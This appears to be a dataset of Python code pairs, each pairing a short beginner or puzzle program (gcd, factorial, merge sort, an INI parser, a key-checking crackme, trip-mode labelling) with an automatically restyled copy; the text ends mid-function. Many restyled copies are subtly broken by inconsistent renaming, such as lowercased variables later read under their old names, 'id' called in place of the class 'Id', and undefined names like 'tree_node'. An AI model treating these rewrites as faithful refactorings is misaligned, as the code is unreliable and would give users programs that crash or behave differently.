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def gcd(x, y): if y == 0: return x else: return gcd(y, x % y) print(gcd(24, 32))
def gcd(x, y): if y == 0: return x else: return gcd(y, x % y) print(gcd(24, 32))
def remove_lead_and_trail_slash(val): if val.startswith('/'): val = val[1:] if val.endswith('/'): val = val[:-1] return val
def remove_lead_and_trail_slash(val): if val.startswith('/'): val = val[1:] if val.endswith('/'): val = val[:-1] return val
#!/usr/bin/python3 """ Surprisingly there are only three numbers that can be written as the sum of fourth powers of their digits: 1634 = 1^4 + 6^4 + 3^4 + 4^4 8208 = 8^4 + 2^4 + 0^4 + 8^4 9474 = 9^4 + 4^4 + 7^4 + 4^4 As 1 = 1^4 is not a sum it is not included. The sum of these numbers is 1634 + 8208 + 9474 = 19316. Find the sum of all the numbers that can be written as the sum of fifth powers of their digits. """ def power5(n: int) -> int: return n**5 def euler30() -> int: tot = 0 for i in range(2*2**5, 6*9**5): tmp = map(int, list(str(i))) sum5 = sum(map(power5, tmp)) if sum5 == i: tot = tot + i return tot tot = euler30() print(tot)
""" Surprisingly there are only three numbers that can be written as the sum of fourth powers of their digits: 1634 = 1^4 + 6^4 + 3^4 + 4^4 8208 = 8^4 + 2^4 + 0^4 + 8^4 9474 = 9^4 + 4^4 + 7^4 + 4^4 As 1 = 1^4 is not a sum it is not included. The sum of these numbers is 1634 + 8208 + 9474 = 19316. Find the sum of all the numbers that can be written as the sum of fifth powers of their digits. """ def power5(n: int) -> int: return n ** 5 def euler30() -> int: tot = 0 for i in range(2 * 2 ** 5, 6 * 9 ** 5): tmp = map(int, list(str(i))) sum5 = sum(map(power5, tmp)) if sum5 == i: tot = tot + i return tot tot = euler30() print(tot)
def countItems(a: list) -> int: if len(a) == 0: return 0 else: return 1 + countItems(a[1:])
def count_items(a: list) -> int: if len(a) == 0: return 0 else: return 1 + count_items(a[1:])
def factorial(n): return 1 if n < 2 else n * factorial(n-1) if __name__=='__main__': for i in range(1, 26): print('%s! = %s' % (i, factorial(i))) """ output: 1! = 1 2! = 2 3! = 6 4! = 24 5! = 120 6! = 720 7! = 5040 8! = 40320 9! = 362880 10! = 3628800 11! = 39916800 12! = 479001600 13! = 6227020800 14! = 87178291200 15! = 1307674368000 16! = 20922789888000 17! = 355687428096000 18! = 6402373705728000 19! = 121645100408832000 20! = 2432902008176640000 21! = 51090942171709440000 22! = 1124000727777607680000 23! = 25852016738884976640000 24! = 620448401733239439360000 25! = 15511210043330985984000000 """
def factorial(n): return 1 if n < 2 else n * factorial(n - 1) if __name__ == '__main__': for i in range(1, 26): print('%s! = %s' % (i, factorial(i))) '\noutput:\n\n1! = 1\n2! = 2\n3! = 6\n4! = 24\n5! = 120\n6! = 720\n7! = 5040\n8! = 40320\n9! = 362880\n10! = 3628800\n11! = 39916800\n12! = 479001600\n13! = 6227020800\n14! = 87178291200\n15! = 1307674368000\n16! = 20922789888000\n17! = 355687428096000\n18! = 6402373705728000\n19! = 121645100408832000\n20! = 2432902008176640000\n21! = 51090942171709440000\n22! = 1124000727777607680000\n23! = 25852016738884976640000\n24! = 620448401733239439360000\n25! = 15511210043330985984000000\n'
''' # > File Name : P1655.py # > Author : Tony_Wong # > Created Time : 2019/12/07 12:05:15 # > Algorithm : Stirling II ''' S = [[0] * 110 for i in range(110)] for i in range(1, 110): S[i][i] = S[i][1] = 1 for j in range(2, i): S[i][j] = S[i - 1][j - 1] + S[i - 1][j] * j while True: try: _input = input().split() n = int(_input[0]) m = int(_input[1]) print(S[n][m]) except EOFError: break
""" # > File Name : P1655.py # > Author : Tony_Wong # > Created Time : 2019/12/07 12:05:15 # > Algorithm : Stirling II """ s = [[0] * 110 for i in range(110)] for i in range(1, 110): S[i][i] = S[i][1] = 1 for j in range(2, i): S[i][j] = S[i - 1][j - 1] + S[i - 1][j] * j while True: try: _input = input().split() n = int(_input[0]) m = int(_input[1]) print(S[n][m]) except EOFError: break
target_steps = 10000 steps_done = 0 while True: line = input() if line == "Going home": home_steps = int(input()) steps_done = steps_done + home_steps if steps_done >= target_steps: print("Goal reached! Good job!") print(f"{steps_done - target_steps} steps over the goal!") break else: print(f"{target_steps - steps_done} more steps to reach goal.") break steps = int(line) steps_done += steps if steps_done >= target_steps: print("Goal reached! Good job!") print(f"{steps_done - target_steps} steps over the goal!") break
target_steps = 10000 steps_done = 0 while True: line = input() if line == 'Going home': home_steps = int(input()) steps_done = steps_done + home_steps if steps_done >= target_steps: print('Goal reached! Good job!') print(f'{steps_done - target_steps} steps over the goal!') break else: print(f'{target_steps - steps_done} more steps to reach goal.') break steps = int(line) steps_done += steps if steps_done >= target_steps: print('Goal reached! Good job!') print(f'{steps_done - target_steps} steps over the goal!') break
def axisAlignedBoundingBox(x, y): minX = x[0] maxX = x[0] minY = y[0] maxY = y[0] for i in range(1, len(x)): minX = min(x[i], minX) maxX = max(x[i], maxX) minY = min(y[i], minY) maxY = max(y[i], maxY) return (maxX - minX) * (maxY - minY)
def axis_aligned_bounding_box(x, y): min_x = x[0] max_x = x[0] min_y = y[0] max_y = y[0] for i in range(1, len(x)): min_x = min(x[i], minX) max_x = max(x[i], maxX) min_y = min(y[i], minY) max_y = max(y[i], maxY) return (maxX - minX) * (maxY - minY)
def integrate(a, b, f, N=2000): dx = (b-a)/N s=0.0 for i in range(N): s += f(a+i*dx) return s * dx
def integrate(a, b, f, N=2000): dx = (b - a) / N s = 0.0 for i in range(N): s += f(a + i * dx) return s * dx
#!/usr/bin/env python3 #coding: utf-8 ### 1st line allows to execute this script by typing only its name in terminal, with no need to precede it with the python command ### 2nd line declaring source code charset should be not necessary but for exemple pydoc request it __doc__ = "INI File Reading and Writing."#information describing the purpose of this module __status__ = "Development"#should be one of 'Prototype' 'Development' 'Production' 'Deprecated' 'Release' __version__ = "1.0.0"# version number,date or about last modification made compared to the previous version __license__ = "public domain"# ref to an official existing License __date__ = "2021"#started creation date / year month day __author__ = "N-zo syslog@laposte.net"#the creator origin of this prog, __maintainer__ = "Nzo"#person who curently makes improvements, replacing the author __credits__ = []#passed mainteners and any other helpers __contact__ = "syslog@laposte.net"# current contact adress for more info about this file class Parser: def __init__(self, pathname): self.parse = {'':{}} self.pathname = pathname def read(self): section='' with open(self.pathname,'r') as f: ### A file is already an iterable full of lines. ### And it's a smart iterable, reading lines as you need them, with some clever buffering under the covers. ### .readlines() reads all the file into memory before starting to loop for line in f : line=line.split("#")[0] line=line.split(";")[0] line=line.strip() if line=='' : pass elif line.startswith('[') and line.endswith(']') : section = line.strip("[]") self.parse.update({section:{}}) elif line.find("=") : pair = line.split("=") key = pair[0].strip() value = pair[1].strip() self.parse[section].update({key: value}) else : raise EOFError def get_sections(self): return self.parse.keys() def get_keys(self,section): return self.parse[section].keys() def get_valu(self,section,key): return self.parse[section][key] def set_valu(self,section,key,valu): self.parse[section][key]=str(valu) def add_section(self,section): self.parse[section]={} def add_key(self,section,key): self.parse[section][key]='' def write_file(self,pathname=None): if not pathname : pathname=self.pathname with open(pathname,'w') as f: for section in self.parse.keys() : f.write( '[{}]\n'.format(section) ) for key in self.parse[section].keys() : valu=self.parse[section][key] f.write( '{} = {}\n'.format(key,valu) ) f.write( '\n' )
__doc__ = 'INI File Reading and Writing.' __status__ = 'Development' __version__ = '1.0.0' __license__ = 'public domain' __date__ = '2021' __author__ = 'N-zo syslog@laposte.net' __maintainer__ = 'Nzo' __credits__ = [] __contact__ = 'syslog@laposte.net' class Parser: def __init__(self, pathname): self.parse = {'': {}} self.pathname = pathname def read(self): section = '' with open(self.pathname, 'r') as f: for line in f: line = line.split('#')[0] line = line.split(';')[0] line = line.strip() if line == '': pass elif line.startswith('[') and line.endswith(']'): section = line.strip('[]') self.parse.update({section: {}}) elif line.find('='): pair = line.split('=') key = pair[0].strip() value = pair[1].strip() self.parse[section].update({key: value}) else: raise EOFError def get_sections(self): return self.parse.keys() def get_keys(self, section): return self.parse[section].keys() def get_valu(self, section, key): return self.parse[section][key] def set_valu(self, section, key, valu): self.parse[section][key] = str(valu) def add_section(self, section): self.parse[section] = {} def add_key(self, section, key): self.parse[section][key] = '' def write_file(self, pathname=None): if not pathname: pathname = self.pathname with open(pathname, 'w') as f: for section in self.parse.keys(): f.write('[{}]\n'.format(section)) for key in self.parse[section].keys(): valu = self.parse[section][key] f.write('{} = {}\n'.format(key, valu)) f.write('\n')
while True: try: code = input("Enter customer code: ") if code == 'r' or code=='R' or code =='c' or code=='C' or code =='i' or code == 'I': tcode = 'ok' else: break iread = float(input("Enter init read: ")) fread = float(input('Enter final reading: ')) except: print('Please enter valid input') continue if iread>0 and fread<999999999: if iread<fread: gallons = (fread-iread)/10 else: gallons = ((1000000000-iread)+fread)/10 #print(gallons) if code =='r' or code == 'R': amount = 5 + (0.0005*gallons) elif code =="c" or code == 'C': if gallons <= 4000000: amount = 1000 else: ngallons = gallons - 4000000 amount = 1000 + (0.00025 *ngallons) else: if code =='i' or code =='I': if gallons<=4000000: amount = 1000 elif gallons >4000000 and gallons < 10000000: ngallons = gallons - 10000000 amount = 2000 + (0.00025*ngallons) print('Customer code:', code) print('Initial reading: ',iread) print('Final reading: ',fread) print('Gallons used: ',gallons) print('Amount used: ', '$'+str(round(amount,2)))
while True: try: code = input('Enter customer code: ') if code == 'r' or code == 'R' or code == 'c' or (code == 'C') or (code == 'i') or (code == 'I'): tcode = 'ok' else: break iread = float(input('Enter init read: ')) fread = float(input('Enter final reading: ')) except: print('Please enter valid input') continue if iread > 0 and fread < 999999999: if iread < fread: gallons = (fread - iread) / 10 else: gallons = (1000000000 - iread + fread) / 10 if code == 'r' or code == 'R': amount = 5 + 0.0005 * gallons elif code == 'c' or code == 'C': if gallons <= 4000000: amount = 1000 else: ngallons = gallons - 4000000 amount = 1000 + 0.00025 * ngallons elif code == 'i' or code == 'I': if gallons <= 4000000: amount = 1000 elif gallons > 4000000 and gallons < 10000000: ngallons = gallons - 10000000 amount = 2000 + 0.00025 * ngallons print('Customer code:', code) print('Initial reading: ', iread) print('Final reading: ', fread) print('Gallons used: ', gallons) print('Amount used: ', '$' + str(round(amount, 2)))
# -*- coding: utf-8 -*- """ Created on Sat Mar 2 22:38:14 2019 @author: Pooyan """ ###################################### class ID: def __init__(hh,name,age): hh.name=name hh.age=age def callback(hh): print("Name: "+hh.name +"Age: "+hh.age) del hh.name name_p=input("Enter your name:") age_p=input("Enter your age:") new_p=ID(name_p,age_p) new_p.callback() print(new_p.name) print(new_p.age)
""" Created on Sat Mar 2 22:38:14 2019 @author: Pooyan """ class Id: def __init__(hh, name, age): hh.name = name hh.age = age def callback(hh): print('Name: ' + hh.name + 'Age: ' + hh.age) del hh.name name_p = input('Enter your name:') age_p = input('Enter your age:') new_p = id(name_p, age_p) new_p.callback() print(new_p.name) print(new_p.age)
# Definition for a binary tree node class TreeNode: def __init__(self, x): self.val = x self.left = None self.right = None # TODO: Do with good solutions class Solution: def convertToDoubly(self, root): head = TreeNode(0) pre = [head] def doublyUtil(root, pre): if not root: return doublyUtil(root.left, pre) node = pre[0] node.right = root root.left = node # save previous node for future double link pre[0] = root doublyUtil(root.right, pre) doublyUtil(root, pre) print("last node value",pre[0].val) root = head while head: print(head.val) head = head.right s = Solution() root = TreeNode(1) root.left = TreeNode(2) root.left.left = TreeNode(6) root.right = TreeNode(3) root.right.left = TreeNode(12) s.convertToDoubly(root)
class Treenode: def __init__(self, x): self.val = x self.left = None self.right = None class Solution: def convert_to_doubly(self, root): head = tree_node(0) pre = [head] def doubly_util(root, pre): if not root: return doubly_util(root.left, pre) node = pre[0] node.right = root root.left = node pre[0] = root doubly_util(root.right, pre) doubly_util(root, pre) print('last node value', pre[0].val) root = head while head: print(head.val) head = head.right s = solution() root = tree_node(1) root.left = tree_node(2) root.left.left = tree_node(6) root.right = tree_node(3) root.right.left = tree_node(12) s.convertToDoubly(root)
def find_count(numbers, target, expression=''): if not numbers: print(expression) if target == 0: return 1 else: return 0 result = 0 result += find_count(numbers[1:], target - numbers[0], expression + f'+{numbers[0]}') result += find_count(numbers[1:], target + numbers[0], expression + f'-{numbers[0]}') return result print(find_count([1, 2, 1, 2], 4))
def find_count(numbers, target, expression=''): if not numbers: print(expression) if target == 0: return 1 else: return 0 result = 0 result += find_count(numbers[1:], target - numbers[0], expression + f'+{numbers[0]}') result += find_count(numbers[1:], target + numbers[0], expression + f'-{numbers[0]}') return result print(find_count([1, 2, 1, 2], 4))
#1 Interation through lists L1 = [3,4,5] L2 = [1,2,3] L3 = [] for i in range(len(L1)): L3.append(L1[i] + L2[i]) print(L3) #2 L1 = [3,4,5] L2 = [1,2,3] L4 = list(zip(L1,L2)) #The zip fuction takes two or more sequences and it makes a list of tuples print(L4) #3 L1 = [3,4,5] L2 = [1,2,3] L3 = [] L4 = list(zip(L1,L2)) #The zip fuction takes two or more sequences and it makes a list of tuples for (x1,x2) in L4: L3.append(x1+x2) print(L3) #4 L1 = [3,4,5] L2 = [1,2,3] L3 = [x1 + x2 for (x1,x2) in list(zip(L1, L2))] print(L3)
l1 = [3, 4, 5] l2 = [1, 2, 3] l3 = [] for i in range(len(L1)): L3.append(L1[i] + L2[i]) print(L3) l1 = [3, 4, 5] l2 = [1, 2, 3] l4 = list(zip(L1, L2)) print(L4) l1 = [3, 4, 5] l2 = [1, 2, 3] l3 = [] l4 = list(zip(L1, L2)) for (x1, x2) in L4: L3.append(x1 + x2) print(L3) l1 = [3, 4, 5] l2 = [1, 2, 3] l3 = [x1 + x2 for (x1, x2) in list(zip(L1, L2))] print(L3)
class TeamConfig: def __init__(self, n_agents=2, initial_epsilon=1.0, final_epsilon=0.1, epsilon_decay=0.999, replay_buffer_size=250000, replay_start_size=200000, batch_size=32, train_interval=4, target_update_interval=5000, ): """ :param n_agents: number of agents in the team :param initial_epsilon: initial exploration rate :param final_epsilon: minimum exploration rate :param replay_buffer_size: the size of the shared replay buffer :param replay_start_size: the initial size of the replay memory before learning starts :param batch_size: the size of a minibatch :param train_interval: number of steps between two training steps if 0, then train after an episode ends :param target_update_interval: number of steps between two updates of the target network """ self.n_agents = n_agents self.initial_epsilon = initial_epsilon self.final_epsilon = final_epsilon self.epsilon_decay = epsilon_decay self.replay_buffer_size = replay_buffer_size self.replay_start_size = replay_start_size self.batch_size = batch_size self.train_interval = train_interval self.target_update_interval = target_update_interval
class Teamconfig: def __init__(self, n_agents=2, initial_epsilon=1.0, final_epsilon=0.1, epsilon_decay=0.999, replay_buffer_size=250000, replay_start_size=200000, batch_size=32, train_interval=4, target_update_interval=5000): """ :param n_agents: number of agents in the team :param initial_epsilon: initial exploration rate :param final_epsilon: minimum exploration rate :param replay_buffer_size: the size of the shared replay buffer :param replay_start_size: the initial size of the replay memory before learning starts :param batch_size: the size of a minibatch :param train_interval: number of steps between two training steps if 0, then train after an episode ends :param target_update_interval: number of steps between two updates of the target network """ self.n_agents = n_agents self.initial_epsilon = initial_epsilon self.final_epsilon = final_epsilon self.epsilon_decay = epsilon_decay self.replay_buffer_size = replay_buffer_size self.replay_start_size = replay_start_size self.batch_size = batch_size self.train_interval = train_interval self.target_update_interval = target_update_interval
def solution(st: str, limit: int) -> str: if len(st) <= limit: return st for i in range(len(st)): return st[i:limit]+'...'
def solution(st: str, limit: int) -> str: if len(st) <= limit: return st for i in range(len(st)): return st[i:limit] + '...'
def MergeSort(m): """ If the length is less than or equal to 1, just return since we don't even need to run SelectionSort """ if len(m) <= 1: return m #Calculate the midpoint and cast to int so there is no decimal middle = int(len(m) / 2) #Init some empty arrays. ls/rs are sorted l = [] r = [] ls = [] rs = [] #The left half must go from 0 to the midpoint (exclusive) l = m[0:middle] #The right half must go from the midpoint and capture all elements to the end r = m[middle:] """ If the length is less than or equal to 4, use SelectionSort, as specified in the Q6a brief If not, use MergeSort """ if len(l) <= 4: ls = SelectionSort(l) else: ls = MergeSort(l) if len(r) <= 4: rs = SelectionSort(r) else: rs = MergeSort(r) #Merge the parts together return Merge(ls, rs) def Merge(l, r): result = [] #While one of the halves is not empty... while(len(l) > 0 or len(r) > 0): #If they're both not empty... if len(l) > 0 and len(r) > 0: #Check if first element in left is greater or equal than right if l[0] >= r[0]: #If it is, append it to result result.append(l[0]) #Remove the element that has been added to result l = l[1:] else: #If not, first element in right must be greater so use it instead result.append(r[0]) r = r[1:] elif len(l) > 0: """ If only left has something Add whatever remaining items are on left to result and clear left """ result += l l = [] else: """ If only right has something Add whatever remaining items are on right to result and clear right """ result += r r = [] return result def SelectionSort(listPart): #Location of max has not yet been found maxLoc = -1 #Iterate through list for i in range(len(listPart)): #Set maxLoc to be the current element maxLoc = i #Iterate through remaining elements of list in front of i for j in range(i + 1, len(listPart)): #If the j element is greater than the one at current maxLoc, set maxLoc to be j if listPart[j] > listPart[maxLoc]: maxLoc = j #Switch the element at i with the one at maxLoc. listPart[i], listPart[maxLoc] = listPart[maxLoc], listPart[i] return listPart
def merge_sort(m): """ If the length is less than or equal to 1, just return since we don't even need to run SelectionSort """ if len(m) <= 1: return m middle = int(len(m) / 2) l = [] r = [] ls = [] rs = [] l = m[0:middle] r = m[middle:] '\n If the length is less than or equal to 4, use SelectionSort, as specified in the Q6a brief\n If not, use MergeSort\n ' if len(l) <= 4: ls = selection_sort(l) else: ls = merge_sort(l) if len(r) <= 4: rs = selection_sort(r) else: rs = merge_sort(r) return merge(ls, rs) def merge(l, r): result = [] while len(l) > 0 or len(r) > 0: if len(l) > 0 and len(r) > 0: if l[0] >= r[0]: result.append(l[0]) l = l[1:] else: result.append(r[0]) r = r[1:] elif len(l) > 0: '\n If only left has something\n Add whatever remaining items are on left to result and clear left\n ' result += l l = [] else: '\n If only right has something\n Add whatever remaining items are on right to result and clear right\n ' result += r r = [] return result def selection_sort(listPart): max_loc = -1 for i in range(len(listPart)): max_loc = i for j in range(i + 1, len(listPart)): if listPart[j] > listPart[maxLoc]: max_loc = j (listPart[i], listPart[maxLoc]) = (listPart[maxLoc], listPart[i]) return listPart
# zdebeer 2021-08-14 # Collection of cuntions that can be used in a template for assiting in transforming values to the required text. def list_format(items, fmt): """format each item in a list""" out = [] for i in items: out.append(fmt.format(i)) return out
def list_format(items, fmt): """format each item in a list""" out = [] for i in items: out.append(fmt.format(i)) return out
class DetectLangsRequest: def __init__(self, text, multi, count): self.text = text self.multi = multi self.count = count
class Detectlangsrequest: def __init__(self, text, multi, count): self.text = text self.multi = multi self.count = count
print('hi\nmy name is : abdullah') print("in this code we will do ") #if elif else print("if elif else") print("\n\n") #________________________# age = int(input("enter your age ")) print(age) if (age > 30 and age<60) : print("wow") elif (age > 60 ): print("old") else : print("almost")
print('hi\nmy name is : abdullah') print('in this code we will do ') print('if elif else') print('\n\n') age = int(input('enter your age ')) print(age) if age > 30 and age < 60: print('wow') elif age > 60: print('old') else: print('almost')
# Exercise 5 # # We will define a new object, SoccerPlayer # 1) Think about what data attributes define a soccer player in real life # Examples include: name, age, position, goals scored # Feel free to be creative! # 2) Write the __init__ method for SoccerPlayer # 3) Write the getters and setters for SoccerPlayer # 4) Think about what actions and behaviors define a soccer player # Examples include: scoring goal, playing soccer match # Again, feel free to be creative! # 5) Write at least two methods for SoccerPlayer # # Feel free to look at Car.py or Classes.py for help! # Now, we will create a new instance of SoccerPlayer # 1) Run SoccerPlayer.py # 2) Create a new instance of SoccerPlayer in the Python shell # 3) Test the methods of SoccerPlayer class SoccerPlayer(): pass
class Soccerplayer: pass
""" Provide help messages for command line interface's batch commands. """ BATCH_IDENTIFIER_ARGUMENT_HELP_MESSAGE = 'Identifier to get a batch by.' BATCH_STATUS_IDENTIFIER_ARGUMENT_HELP_MESSAGE = 'Identifier to get a batch status by.' BATCHES_IDENTIFIERS_ARGUMENT_HELP_MESSAGE = 'Identifiers to get a list of batches by.' BATCHES_START_ARGUMENT_HELP_MESSAGE = 'Batch identifier to get a list of batches starting from.' BATCHES_LIMIT_ARGUMENT_HELP_MESSAGE = 'Maximum amount of batches to return.' BATCHES_HEAD_ARGUMENT_HELP_MESSAGE = 'Block identifier to get a list of batches to.' BATCHES_REVERSE_ARGUMENT_HELP_MESSAGE = 'Parameter to reverse result.' BATCHES_IDENTIFIERS_ONLY_ARGUMENT_HELP_MESSAGE = 'The flag to get a list of batches\' identifiers.'
""" Provide help messages for command line interface's batch commands. """ batch_identifier_argument_help_message = 'Identifier to get a batch by.' batch_status_identifier_argument_help_message = 'Identifier to get a batch status by.' batches_identifiers_argument_help_message = 'Identifiers to get a list of batches by.' batches_start_argument_help_message = 'Batch identifier to get a list of batches starting from.' batches_limit_argument_help_message = 'Maximum amount of batches to return.' batches_head_argument_help_message = 'Block identifier to get a list of batches to.' batches_reverse_argument_help_message = 'Parameter to reverse result.' batches_identifiers_only_argument_help_message = "The flag to get a list of batches' identifiers."
g = 9.81 l1 = 1 l2 = 1 m1 = 1 m2 = 1
g = 9.81 l1 = 1 l2 = 1 m1 = 1 m2 = 1
""" The Jumping Cloud challenge is about a girl, Emma, that has to jump through the clouds to reach the end point. In order to arrive safe, she has to avoid the thunder clouds. The path is given as an array (c) containing binary integers. 0 means that a cloud is safe and 1 means it must be avoided. The objective is to find out the minimum number of jumps that Emma has to perform. She can either jump 1 cloud or 2 clouds at a time. """ def jumpingOnClouds(c): # Index of current cloud current = 0 # Path ending end = len(c) -1 # Number of jumps jumps = 0 while current < end: # If there is a cloud 2 jumps ahead and it's safe update current index by 2 and add jump if ((current+2) <= end) and c[current+2] == 0: current += 2 jumps += 1 # If not and the next cloud is safe, update index by 1 and add jump elif c[current + 1] == 0: current += 1 jumps += 1 return jumps if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') n = int(input()) c = list(map(int, input().rstrip().split())) result = jumpingOnClouds(c) fptr.write(str(result) + '\n') fptr.close()
""" The Jumping Cloud challenge is about a girl, Emma, that has to jump through the clouds to reach the end point. In order to arrive safe, she has to avoid the thunder clouds. The path is given as an array (c) containing binary integers. 0 means that a cloud is safe and 1 means it must be avoided. The objective is to find out the minimum number of jumps that Emma has to perform. She can either jump 1 cloud or 2 clouds at a time. """ def jumping_on_clouds(c): current = 0 end = len(c) - 1 jumps = 0 while current < end: if current + 2 <= end and c[current + 2] == 0: current += 2 jumps += 1 elif c[current + 1] == 0: current += 1 jumps += 1 return jumps if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') n = int(input()) c = list(map(int, input().rstrip().split())) result = jumping_on_clouds(c) fptr.write(str(result) + '\n') fptr.close()
rand_map = [47, 20, 77, 91, 7, 18, 55, 46, 17, 60, 27, 40, 85, 15, 11, 12, 92, 9, 76, 62, 16, 80, 44, 13, 10, 67, 86, 65, 89, 81, 68, 26, 6, 64, 54, 57, 25, 45, 1, 83, 38, 71, 36, 75, 33, 79, 29, 63, 50, 70, 90, 56, 51, 37, 61, 42, 39, 93, 66, 43, 0, 2, 53, 74, 5, 22, 69, 82, 3, 28, 30, 34, 23, 19, 31, 84, 24, 41, 59, 4, 52, 73, 8, 35, 88, 78, 14, 49, 58, 32, 21, 72, 87, 48] def starter(): print("Enter key:") ans = input() l_ans = [c for c in ans] for i in range(len(l_ans)): l_ans[i] = chr(rand_map[ord(l_ans[i])-32]+32) l_ans[i] = chr(ord(l_ans[i])+pow(-1,(ord(l_ans[i])%2))) ans = "" for i in l_ans: ans = ans + str(i) if(ans == "4=ZB=XR iH1US5ZCks1<kC_RkA}DkW1sjkP6_{_k2RkBy1{y_85Q"): print("Kudos! You entered the right key!") else: print("Work it out further!") starter()
rand_map = [47, 20, 77, 91, 7, 18, 55, 46, 17, 60, 27, 40, 85, 15, 11, 12, 92, 9, 76, 62, 16, 80, 44, 13, 10, 67, 86, 65, 89, 81, 68, 26, 6, 64, 54, 57, 25, 45, 1, 83, 38, 71, 36, 75, 33, 79, 29, 63, 50, 70, 90, 56, 51, 37, 61, 42, 39, 93, 66, 43, 0, 2, 53, 74, 5, 22, 69, 82, 3, 28, 30, 34, 23, 19, 31, 84, 24, 41, 59, 4, 52, 73, 8, 35, 88, 78, 14, 49, 58, 32, 21, 72, 87, 48] def starter(): print('Enter key:') ans = input() l_ans = [c for c in ans] for i in range(len(l_ans)): l_ans[i] = chr(rand_map[ord(l_ans[i]) - 32] + 32) l_ans[i] = chr(ord(l_ans[i]) + pow(-1, ord(l_ans[i]) % 2)) ans = '' for i in l_ans: ans = ans + str(i) if ans == '4=ZB=XR iH1US5ZCks1<kC_RkA}DkW1sjkP6_{_k2RkBy1{y_85Q': print('Kudos! You entered the right key!') else: print('Work it out further!') starter()
course = "Python 101" name = ("Carl Richard Matson") print(course) # Python 101 print(name)
course = 'Python 101' name = 'Carl Richard Matson' print(course) print(name)
def label_modes(trip_list, silent=True): """Labels trip segments by likely mode of travel. Labels are "chilling" if traveler is stationary, "walking" if slow, "driving" if fast, and "bogus" if too fast to be real. trip_list [list]: a list of dicts in JSON format. silent [bool]: if True, does not print reports. Returns list of dicts in JSON format.""" if silent == False: print('Preparing to label modes of travel for ' \ + str(len(trip_list)) + ' trips.') loop_counter = 0 loop_size = len(trip_list) for doc in trip_list: if silent == False: loop_counter = loop_counter + 1 if loop_counter % 10000 == 0: print('Labeling modes. Finished ' + str(loop_counter) \ + ' trips.') time_spent_driving = 0 time_spent_walking = 0 time_spent_chilling = 0 time_spent_bogus = 0 for i in range(1,len(doc['reduction'])): if (float(doc['reduction'][i]['velocity']) >= 2.3): doc['reduction'][i]['mode'] = 'driving' elif (float(doc['reduction'][i]['velocity']) < 2.3 and float(doc['reduction'][i]['velocity']) > 0): doc['reduction'][i]['mode'] = 'walking' elif (float(doc['reduction'][i]['velocity']) == 0.0): doc['reduction'][i]['mode'] = 'chilling' if (float(doc['reduction'][i]['velocity']) > 22.22): doc['reduction'][i]['mode'] = 'bogus' for i in range(1,len(doc['reduction']) - 1): path_length = 0 if (doc['reduction'][i]['mode'] == 'driving'): for j in range(i+1,len(doc['reduction'])): last_intersection_id = doc['reduction'][j]['IntersectionID'] if (doc['reduction'][j]['mode'] == 'walking'): path_length = path_length + 1 elif (doc['reduction'][j]['mode'] == 'driving' or doc['reduction'][j]['mode'] == 'bogus'): break if (path_length > 5 or last_intersection_id == doc['reduction'][i]['IntersectionID']): for k in range(i+1,j): if (doc['reduction'][k]['mode'] != 'chilling'): doc['reduction'][k]['mode'] = 'walking' else : for k in range(i+1,j): if (doc['reduction'][k]['mode'] != 'chilling'): doc['reduction'][k]['mode'] = 'driving' if (doc['reduction'][i]['mode'] == 'driving'): time_spent_driving = time_spent_driving + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time']) elif (doc['reduction'][i]['mode'] == 'walking'): time_spent_walking = time_spent_walking + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time']) elif (doc['reduction'][i]['mode'] == 'chilling'): time_spent_chilling = time_spent_chilling + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time']) elif (doc['reduction'][i]['mode'] == 'bogus'): time_spent_bogus = time_spent_bogus + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time']) if (doc['reduction'][-1]['mode'] == 'driving'): time_spent_driving = time_spent_driving + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time']) elif (doc['reduction'][-1]['mode'] == 'walking'): time_spent_walking = time_spent_walking + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time']) elif (doc['reduction'][-1]['mode'] == 'chilling'): time_spent_chilling = time_spent_chilling + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time']) elif (doc['reduction'][-1]['mode'] == 'bogus'): time_spent_bogus = time_spent_bogus + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time']) duration_of_trip = float(doc['duration_of_trip']) doc['time_percentage_driving'] = str(time_spent_driving/duration_of_trip*100) doc['time_percentage_walking'] = str(time_spent_walking/duration_of_trip*100) doc['time_percentage_chilling'] = str(time_spent_chilling/duration_of_trip*100) doc['time_percentage_bogus'] = str(time_spent_bogus/duration_of_trip*100) if silent == False: print('Done labeling mode of travel. Returning list of length ' \ + str(len(trip_list)) + '.') return trip_list
def label_modes(trip_list, silent=True): """Labels trip segments by likely mode of travel. Labels are "chilling" if traveler is stationary, "walking" if slow, "driving" if fast, and "bogus" if too fast to be real. trip_list [list]: a list of dicts in JSON format. silent [bool]: if True, does not print reports. Returns list of dicts in JSON format.""" if silent == False: print('Preparing to label modes of travel for ' + str(len(trip_list)) + ' trips.') loop_counter = 0 loop_size = len(trip_list) for doc in trip_list: if silent == False: loop_counter = loop_counter + 1 if loop_counter % 10000 == 0: print('Labeling modes. Finished ' + str(loop_counter) + ' trips.') time_spent_driving = 0 time_spent_walking = 0 time_spent_chilling = 0 time_spent_bogus = 0 for i in range(1, len(doc['reduction'])): if float(doc['reduction'][i]['velocity']) >= 2.3: doc['reduction'][i]['mode'] = 'driving' elif float(doc['reduction'][i]['velocity']) < 2.3 and float(doc['reduction'][i]['velocity']) > 0: doc['reduction'][i]['mode'] = 'walking' elif float(doc['reduction'][i]['velocity']) == 0.0: doc['reduction'][i]['mode'] = 'chilling' if float(doc['reduction'][i]['velocity']) > 22.22: doc['reduction'][i]['mode'] = 'bogus' for i in range(1, len(doc['reduction']) - 1): path_length = 0 if doc['reduction'][i]['mode'] == 'driving': for j in range(i + 1, len(doc['reduction'])): last_intersection_id = doc['reduction'][j]['IntersectionID'] if doc['reduction'][j]['mode'] == 'walking': path_length = path_length + 1 elif doc['reduction'][j]['mode'] == 'driving' or doc['reduction'][j]['mode'] == 'bogus': break if path_length > 5 or last_intersection_id == doc['reduction'][i]['IntersectionID']: for k in range(i + 1, j): if doc['reduction'][k]['mode'] != 'chilling': doc['reduction'][k]['mode'] = 'walking' else: for k in range(i + 1, j): if doc['reduction'][k]['mode'] != 'chilling': doc['reduction'][k]['mode'] = 'driving' if 